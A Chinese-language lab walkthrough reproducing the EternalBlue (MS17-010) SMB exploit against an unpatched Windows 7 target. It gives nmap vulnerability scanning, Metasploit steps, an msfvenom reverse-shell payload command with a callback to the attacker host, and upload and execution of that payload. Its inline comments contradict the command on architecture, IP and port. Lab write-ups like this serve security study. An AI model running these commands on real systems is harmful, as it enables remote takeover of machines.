声明:文中涉及到的技术和工具,仅供学习使用,禁止从事任何非法活动,如因此造成的直接或间接损失,均由使用者自行承担责任。
永恒之蓝是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。
SMB协议基础
定义:客户机/服务器架构的请求/响应协议,主要用于文件共享、打印机共享、网络登录等
关联端口:TCP 139端口(NetBIOS会话端口)、TCP 445端口(SMB直接连接端口)
日常应用:Windows系统"网上邻居"功能的底层依赖协议
漏洞利用实验
实验环境
攻击机:Kali Linux
目标机:Windows 7(开启SMB服务,未安装MS17-010补丁)
验证漏洞存在
扫描目标主机是否存在smb协议漏洞(MS17-010)
nmap --script smb-vuln* 192.168.65.130
复现步骤
启动Metasploit Framework
查找ms17-010相关模块
set rhosts 192.168.65.130
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.65.129 LPORT=9999 -f exe > shell.exe# msfvenom:Metasploit 的 payload 生成器(生成 raw shellcode 或封装到可执行文件/脚本等)# -p windows/x64/meterpreter/reverse_tcp:指定 payload(这里是 x64 Meterpreter 反连 TCP)# LHOST=192.168.65.130:payload 连接回攻击机(攻击机IP,目标必须能访问到这个地址)# LPORT=4444:监听端口(payload 反连到这个端口)# -f exe:输出格式为 Windows 可执行文件(PE exe)# > shell.exe 或 -o shell.exe:将输出写入文件 shell.exe
upload shell.exe shell_in_win7.exe
在被控机上创建并运行名为 shell_in_win7.exe的可执行程序
execute -f shell_in_win7.exe
打开新的命令窗口,启动Metasploit Framework加载hanlder模块use exploit/multi/handler# 处理来自目标系统的反向连接,允许攻击者接收并交互式地控制目标主机